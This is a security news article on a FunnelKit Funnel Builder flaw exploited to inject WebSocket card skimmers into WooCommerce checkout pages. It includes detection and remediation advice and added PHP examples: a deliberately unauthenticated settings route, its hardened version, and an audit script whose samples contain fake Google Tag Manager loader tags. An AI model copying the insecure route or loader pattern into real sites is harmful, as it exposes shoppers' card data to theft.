
FunnelKit WordPress Bug Lets Hackers Skim 40,000+ WooCommerce Checkouts — Here’s How They Do It

A critical vulnerability in the FunnelKit Funnel Builder WordPress plugin is being actively exploited to inject credit card skimmers into the checkout pages of WooCommerce stores. The plugin is installed on more than 40,000 sites, and the flaw requires no authentication, so an attacker can alter the scripts loaded into the payment flow of any unpatched store. It ranks among the most dangerous e-commerce threats seen so far in 2026.

What sets the campaign apart is the pairing: a trivially exploitable plugin bug combined with a skimmer that exfiltrates stolen card data over WebSockets rather than ordinary HTTP requests.

What Happened


If you’re running a WooCommerce store with FunnelKit’s Funnel Builder plugin, you need to stop what you’re doing and check your site right now. A critical vulnerability in the plugin, which is installed on more than 40,000 WordPress sites, is being actively exploited in the wild to inject credit card skimmers directly into checkout pages.

The attack was first documented by Sansec, a Dutch cybersecurity firm that specializes in e-commerce malware detection. Their researchers found that attackers are exploiting an unauthenticated access flaw to plant fake Google Tag Manager scripts that silently harvest every credit card number, CVV, billing address, and personal detail that customers enter at checkout.

This isn’t theoretical. This is happening right now, and the stolen data is being exfiltrated in real time over WebSocket connections, a channel that is much harder to spot with tooling that inspects individual HTTP requests.

How the WooCommerce Skimming Exploit Works via FunnelKit

The attack chain is devastatingly simple, which is part of what makes it so dangerous. Here’s the step-by-step breakdown of how attackers are compromising WooCommerce stores:

Step 1: Exploit the unauthenticated endpoint. The Funnel Builder plugin exposes a REST API endpoint that fails to verify user permissions. Attackers send a crafted request to this endpoint to modify global plugin settings without needing any login credentials whatsoever.

Step 2: Inject malicious script via “External Scripts” setting. The plugin has a legitimate feature called “External Scripts” that allows site administrators to add tracking scripts (like Google Analytics or Facebook Pixel) to checkout pages. Attackers abuse this feature by injecting a script tag that loads malware from a remote server, disguised as a Google Tag Manager snippet.

Step 3: Load the skimmer dynamically. The injected script doesn’t contain the actual skimmer code. Instead, it loads a secondary JavaScript file from an attacker-controlled domain. This two-stage loading makes static analysis more difficult and allows attackers to update the skimmer payload without re-exploiting the vulnerability.

Step 4: Steal payment data over a WebSocket. The final payload opens a WebSocket connection to a command-and-control server and streams payment details as customers type them into the checkout form. The exfiltration happens entirely inside the customer’s browser, so nothing about it appears in the store’s own server logs, and monitoring that looks for discrete outbound HTTP POSTs sees only a single Upgrade handshake followed by an opaque stream of frames.

The FunnelKit Vulnerability: No Auth, Full Control

The root cause is an endpoint that doesn’t check whether the person making the request is actually an administrator. In WordPress development, every REST API endpoint that modifies data should include a permission_callback that verifies the user has the appropriate capability, typically manage_options or manage_woocommerce for settings changes. Since WordPress 5.5, register_rest_route() emits a _doing_it_wrong notice when permission_callback is omitted, but the route still registers and still works, so the notice is a warning to the developer, not a safeguard for the site.

The vulnerable endpoint in Funnel Builder skipped this check entirely. Any unauthenticated user could send a POST request and modify the plugin’s global settings, including the External Scripts field that gets injected into every checkout page. It’s the kind of bug that should never make it past code review, but somehow did.
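The following is an added illustration of the bug class described above, written for this article rather than taken from FunnelKit’s code: a settings route registered without a permission_callback, next to a hardened version of the same route. The namespace (`example-funnel/v1`), route paths, option name and function names are hypothetical, and the allowlist of script hosts is a defence-in-depth choice that the plugin itself is not described as making.

```php
<?php
// Added example, not FunnelKit's code. Namespace, routes, option name and
// function names are hypothetical; only the WordPress APIs used are real.

add_action('rest_api_init', function () {
    // VULNERABLE: no permission_callback. WordPress >= 5.5 logs a
    // _doing_it_wrong notice for this, but the route still works, so any
    // anonymous visitor can POST here and overwrite the plugin's settings.
    register_rest_route('example-funnel/v1', '/settings', [
        'methods'  => WP_REST_Server::EDITABLE, // POST, PUT, PATCH
        'callback' => 'example_save_settings',
        // 'permission_callback' => ...  <-- the missing check that is the root cause
    ]);

    // HARDENED: same handler, but the caller must be an authenticated user
    // with manage_options (cookie auth with an X-WP-Nonce header, or an
    // application password), and the input is sanitized before it is stored.
    register_rest_route('example-funnel/v1', '/settings-secure', [
        'methods'             => WP_REST_Server::EDITABLE,
        'callback'            => 'example_save_settings',
        'permission_callback' => function (WP_REST_Request $request) {
            if (! current_user_can('manage_options')) {
                return new WP_Error(
                    'rest_forbidden',
                    'You are not allowed to change these settings.',
                    ['status' => rest_authorization_required_code()] // 401 or 403
                );
            }
            return true;
        },
        'args' => [
            'external_scripts' => [
                'type'              => 'string',
                'required'          => false,
                'sanitize_callback' => 'example_sanitize_external_scripts',
            ],
        ],
    ]);
});

// Shared handler: writes the "External Scripts" field into a (hypothetical) option.
function example_save_settings(WP_REST_Request $request) {
    $settings = (array) get_option('example_funnel_settings', []);
    $settings['external_scripts'] = (string) $request->get_param('external_scripts');
    update_option('example_funnel_settings', $settings);
    return rest_ensure_response(['updated' => true]);
}

// Defence in depth for a field that is echoed into every checkout page:
// keep only <script src="..."> tags whose host is on an explicit allowlist,
// and drop inline script bodies entirely. A real GTM container can still be
// loaded this way; a "GTM" snippet pointing at an unknown host cannot.
function example_sanitize_external_scripts($value) {
    $allowed_hosts = ['www.googletagmanager.com', 'www.google-analytics.com', 'connect.facebook.net'];
    $kept = [];
    $pattern = '#<script\b[^>]*\bsrc=["\']([^"\']+)["\'][^>]*>\s*</script>#i';
    if (preg_match_all($pattern, (string) $value, $matches, PREG_SET_ORDER)) {
        foreach ($matches as $tag) {
            $host = strtolower((string) wp_parse_url($tag[1], PHP_URL_HOST));
            if (in_array($host, $allowed_hosts, true)) {
                $kept[] = $tag[0];
            }
        }
    }
    return implode("\n", $kept);
}
```

The permission_callback is the fix for the reported bug; the sanitize_callback is there to show that even an authenticated settings field that ends up in checkout HTML deserves an allowlist, because a compromised admin account or a second bug would otherwise lead to the same outcome.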

The vulnerability affects all versions of Funnel Builder prior to version 3.15.0.3. As of this writing, the flaw does not have an official CVE identifier assigned, though multiple security firms are tracking it.

The WebSocket Skimmer: A New Breed of Payment Theft

What makes this attack particularly insidious is the use of WebSocket connections for data exfiltration. Traditional credit card skimmers typically send stolen data via HTTP POST requests to a collection server. Each theft is a discrete request with a readable body, which is exactly what browser-side monitoring, client-side malware scanners and request-logging proxies are built to spot, and a Content Security Policy that restricts connect-src blocks it outright.

WebSocket-based exfiltration is different. Once the initial Upgrade handshake completes, data flows through a single persistent connection as opaque frames that look like legitimate real-time communication (live chat, stock or shipping updates). Note that CSP connect-src also governs WebSocket connections, so a strict policy on the checkout page would still have stopped this; the evasion is aimed at tooling that only inspects individual HTTP requests. Sansec observed the skimmer connecting to wss://protect-wss[.]com/ws, a domain name deliberately chosen to look like a security service.

The skimmer is also “tailored to the victim’s storefront,” meaning attackers customize the malicious code to match each compromised site’s checkout form structure. This level of sophistication suggests an organized operation, not a script kiddie running automated scans.

Who Discovered the WooCommerce Skimming Exploit

The in-the-wild exploitation was documented by Sansec, whose analysis covered the injected loader and the WebSocket C2 infrastructure. GBHackers and BleepingComputer subsequently reported on the findings and added further technical details.

The speed at which this vulnerability moved from discovery to active exploitation underscores a growing problem in the WordPress ecosystem: attackers are monitoring plugin changelogs and reverse-engineering patches to find exploitable flaws before most site owners have a chance to update.

Scale of the Damage

FunnelKit’s Funnel Builder is used by more than 40,000 WooCommerce stores worldwide. These aren’t small hobby sites — they’re active e-commerce businesses processing real customer payments. Every compromised checkout page represents potentially thousands of stolen credit card numbers.

The damage extends beyond the immediate financial losses from stolen payment data. Affected businesses face PCI DSS compliance violations, potential fines from payment processors, mandatory forensic investigations, customer notification obligations, and lasting reputational damage. For small and medium-sized businesses, a single successful skimming attack can be existentially threatening.

The true number of compromised stores hasn’t been disclosed, but given that the vulnerability was exploitable without authentication and the plugin’s large install base, the actual impact is likely significant.

How to Check If You’re Affected

If you’re running Funnel Builder on your WooCommerce store, here’s what you need to do immediately:

Check your plugin version. Go to your WordPress dashboard, navigate to Plugins, and look at the version number for “Funnel Builder by FunnelKit.” If it’s anything below 3.15.0.3, you’re potentially vulnerable.

Inspect the External Scripts setting. Navigate to FunnelKit → Settings → Checkout → External Scripts. Look for any script tags you didn’t add yourself. Pay special attention to anything that references Google Tag Manager but uses an unfamiliar domain, or any script loading from a domain you don’t recognize.

Check for WebSocket connections. Open your browser’s developer tools on your checkout page, go to the Network tab, and filter by “WS” (WebSocket). Because the skimmer is tailored to the storefront and harvests data as it is typed, go through a test checkout with dummy details rather than just loading the page. If you see any WebSocket connections to domains you don’t recognize, especially anything involving “protect-wss” or similar security-sounding names, your site has likely been compromised.

Review server access logs. REST API requests arrive under /wp-json/ (or as ?rest_route= query strings if pretty permalinks are off). Look for POST, PUT or PATCH requests to FunnelKit routes, particularly any that modify settings and come from unfamiliar IP addresses or non-browser user agents, and correlate their timestamps with when the External Scripts setting last changed.
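To make the External Scripts inspection and the log review repeatable, here is an added audit helper written for this article (it is not FunnelKit’s or Sansec’s code). It extracts every URL from a saved External Scripts value and classifies each host as a known tag vendor, a vendor-branded lookalike, an unknown host or a WebSocket endpoint, then parses combined-format access log lines for write requests to matching REST routes. The sample setting value and log lines are constructed, and the REST path pattern is an assumption: replace it with the namespace your installed plugin version actually registers.

```php
<?php
/**
 * Added audit helper, not part of the article's sources or of FunnelKit.
 * Run with: php audit-checkout-scripts.php
 * Sample data below is constructed; the REST route pattern is an assumption.
 */

// Hosts that genuine Google Tag Manager / Analytics / Meta Pixel snippets reference.
const KNOWN_TAG_HOSTS = [
    'www.googletagmanager.com',
    'www.google-analytics.com',
    'connect.facebook.net',
];

/**
 * Pull every http(s)/ws(s) URL out of an "External Scripts" value and classify
 * its host. A real GTM snippet is inline JS that only references
 * googletagmanager.com, so any other host inside a "GTM" snippet is the tell.
 */
function audit_external_scripts(string $setting): array
{
    $findings = [];
    preg_match_all('#\b(https?|wss?)://([a-z0-9.-]+)[^\s"\'<>]*#i', $setting, $m, PREG_SET_ORDER);
    foreach ($m as $hit) {
        [$url, $scheme, $host] = $hit;
        $host = strtolower($host);
        if (in_array(strtolower($scheme), ['ws', 'wss'], true)) {
            $verdict = 'WEBSOCKET';   // no tag vendor needs a WebSocket from checkout
        } elseif (in_array($host, KNOWN_TAG_HOSTS, true)) {
            $verdict = 'known';
        } elseif (preg_match('/gtm|tagmanager|googletag|analytics|pixel/i', $host)) {
            $verdict = 'LOOKALIKE';   // vendor branding on a host that is not the vendor
        } else {
            $verdict = 'UNKNOWN';
        }
        $findings[] = ['url' => $url, 'host' => $host, 'verdict' => $verdict];
    }
    return $findings;
}

/**
 * Parse combined-format access log lines and return write requests (POST/PUT/
 * PATCH) whose path matches $route_pattern. An unauthenticated settings write
 * like the one described above shows up here as a POST from an unfamiliar IP.
 */
function audit_rest_writes(array $lines, string $route_pattern): array
{
    $hits = [];
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(POST|PUT|PATCH) (\S+) [^"]*" (\d{3})/';
    foreach ($lines as $line) {
        if (preg_match($re, $line, $m) && preg_match($route_pattern, $m[4])) {
            $hits[] = ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
                       'path' => $m[4], 'status' => (int) $m[5]];
        }
    }
    return $hits;
}

// --- Constructed sample data: one real-looking GTM container, one fake one,
// --- and a bare loader tag, as an attacker-edited setting might contain.
$sample_setting = <<<'HTML'
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var j=d.createElement(s);j.async=true;
j.src='https://gtm-cdn.example/gtm.js?id='+i;d.head.appendChild(j);})(window,document,'script','dataLayer','GTM-YYYYYYY');</script>
<script src="https://checkout-loader.example/ws.js"></script>
HTML;

$sample_log = [
    '203.0.113.7 - - [10/Feb/2026:03:14:07 +0000] "POST /wp-json/example-funnel/v1/settings HTTP/1.1" 200 61 "-" "python-requests/2.31"',
    '198.51.100.4 - - [10/Feb/2026:03:14:09 +0000] "GET /checkout/ HTTP/1.1" 200 48212 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Feb/2026:03:14:11 +0000] "POST /wp-json/wc/store/v1/cart/add-item HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
];

foreach (audit_external_scripts($sample_setting) as $f) {
    printf("%-10s %s\n", $f['verdict'], $f['url']);
}

// Assumption: the vulnerable route lives under a namespace containing "funnel".
// Confirm the real namespace for your plugin version and adjust the pattern.
foreach (audit_rest_writes($sample_log, '#^/wp-json/[^/]*funnel[^/]*/#i') as $h) {
    printf("%s %s %s -> %d from %s\n", $h['time'], $h['method'], $h['path'], $h['status'], $h['ip']);
}
```

On the constructed sample the first snippet is classified as known, the second as LOOKALIKE (vendor branding on gtm-cdn.example) and the bare loader as UNKNOWN; only the first log line matches the write-to-funnel-route pattern. Feed the real setting value (for example via `wp option get`) and your actual access logs in place of the samples.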

Patch and Remediation

FunnelKit has released a patch in version 3.15.0.3 that adds proper authentication checks to the vulnerable endpoint. Update immediately through your WordPress dashboard or by downloading the latest version from the WordPress plugin repository.

But updating alone isn’t enough if your site was already compromised. You also need to remove any malicious scripts from the External Scripts setting, scan your entire WordPress installation for additional backdoors, change all administrator passwords, notify your payment processor about the potential breach, and consider engaging a forensic team to determine the scope of data exposure.

If you’re using a web application firewall like Wordfence or Sucuri, make sure your rules are updated to block exploitation attempts against this specific endpoint.

Why the WooCommerce Skimming Exploit Shows Plugin Security Is Getting Worse

This isn’t an isolated incident. WordPress plugin vulnerabilities have been behind some of the largest web-based attacks in recent years, and they sit alongside a wider pattern of hosting-stack compromise, from the AI-assisted attack campaigns documented by Mandiant to the cPanel zero-day that hit 44,000 servers.

The core problem is structural. WordPress’s plugin ecosystem incentivizes rapid development and feature addition, but doesn’t enforce meaningful security review before plugins are listed in the official repository. Plugin developers are often small teams or solo developers who may lack security expertise. And site owners frequently install plugins without understanding the attack surface they’re adding.

The FunnelKit vulnerability — a missing permission check on a settings endpoint — is one of the most basic categories of web application security flaws. The fact that it made it into production in a plugin used by 40,000+ e-commerce sites speaks to systemic gaps in the WordPress plugin development and review process.

Final Thoughts

The FunnelKit exploit is a textbook example of how a simple vulnerability can cascade into a massive security incident. An unauthenticated settings modification led to JavaScript injection, which led to real-time credit card theft across potentially thousands of WooCommerce stores. The use of WebSocket-based exfiltration and a domain disguised as a security service shows that e-commerce attackers are getting more sophisticated in their techniques.

If you run any WooCommerce store — whether you use FunnelKit or not — this should be a wake-up call. Audit your plugins, enable automated security scanning, and never assume that a plugin from the official WordPress repository is secure by default. The attackers certainly aren’t making that assumption.

How the FunnelKit WordPress Exploit Compares to Past WooCommerce Attacks

The FunnelKit exploit follows a disturbing pattern of attacks that reach e-commerce checkouts through WordPress extensions. In 2024, Sucuri documented the Dessky Snippets plugin being abused in a similar way, with payment skimmers injected through a seemingly legitimate code-snippet plugin rather than through the store’s own theme or core files.

What makes the FunnelKit vulnerability particularly dangerous is its position in the checkout funnel. Unlike generic WordPress malware that targets login forms or admin panels, this exploit intercepts payment data at the most sensitive point in the customer journey, where customers expect to enter card details and have no reason to suspect the form in front of them.

Store owners running WooCommerce with FunnelKit should audit their checkout pages immediately using browser developer tools. Look for unexpected JavaScript includes, especially any code making external network requests to unfamiliar domains. The security section of the WordPress Plugin Handbook provides guidance on the checks (capabilities, nonces, sanitization) that plugin code should contain.
